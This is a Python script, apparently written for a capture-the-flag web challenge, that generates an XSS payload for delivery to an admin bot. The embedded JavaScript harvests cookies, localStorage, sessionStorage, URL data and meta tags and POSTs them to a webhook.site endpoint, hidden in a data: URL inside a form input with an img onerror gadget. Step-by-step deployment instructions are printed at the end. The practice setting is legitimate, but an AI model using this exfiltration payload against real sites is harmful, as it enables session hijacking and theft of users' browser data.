#!/usr/bin/env python3
"""
FINAL ANSWER: Payload for the ACTUAL challenge (remote server)

On the remote server, the FLAG is most likely exposed via:
1. Cookie (most common in CTF)
2. LocalStorage  
3. Query parameter
4. Custom header (visible via fetch timing or errors)

This payload checks all of these.
"""

import urllib.parse
WEBHOOK = "https://webhook.site/YOUR-WEBHOOK-ID"  # Replace

code = f"""
(async () => {{
    // Most likely: Cookie with HTTPOnly=false
    const flag_data = {{
        cookie: document.cookie,
        
        // Check URL parameters  
        url_params: location.search,
        url_hash: location.hash,
        full_url: location.href,
        
        // Check storage
        localStorage: {{}},
        sessionStorage: {{}},
        
        // Check for flag in window object
        window_flag: window.FLAG || window.flag || null,
        
        // All cookies individually
        all_cookies: document.cookie.split(';').map(c => c.trim()),
        
        // Document properties that might contain flag
        referrer: document.referrer,
        title: document.title,
        
        // Check meta tags
        meta_tags: Array.from(document.querySelectorAll('meta')).map(m => ({{
            name: m.name || m.getAttribute('property'),
            content: m.content
        }}))
    }};
    
    // Read localStorage
    try {{
        for (let i = 0; i < localStorage.length; i++) {{
            const key = localStorage.key(i);
            flag_data.localStorage[key] = localStorage.getItem(key);
        }}
    }} catch(e) {{}}
    
    // Read sessionStorage
    try {{
        for (let i = 0; i < sessionStorage.length; i++) {{
            const key = sessionStorage.key(i);
            flag_data.sessionStorage[key] = sessionStorage.getItem(key);
        }}
    }} catch(e) {{}}
    
    // Send to webhook
    await fetch('{WEBHOOK}', {{
        method: 'POST',
        headers: {{'Content-Type': 'application/json'}},
        body: JSON.stringify(flag_data, null, 2)
    }});
}})();
""".replace('\n', ' ')

encoded = urllib.parse.quote(code)

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("=" * 80)
print("FINAL PAYLOAD FOR REMOTE SERVER")
print("=" * 80)
print("\n1. Replace YOUR-WEBHOOK-ID in this file")
print("2. Run this script to generate the payload")
print("3. Create a paste with the output")
print("4. Report it to the bot")
print("5. Check your webhook\n")
print("=" * 80)
print("\nPAYLOAD:\n")
print(payload)
print("\n" + "=" * 80)
print("\n🎯 MOST LIKELY: The flag will be in 'cookie' field")
print(
    "   The remote bot.py probably does: driver.add_cookie({{'name':'flag', 'value':FLAG}})")
print("\n📝 LESS LIKELY: localStorage, URL parameter, or window.FLAG")
print("=" * 80)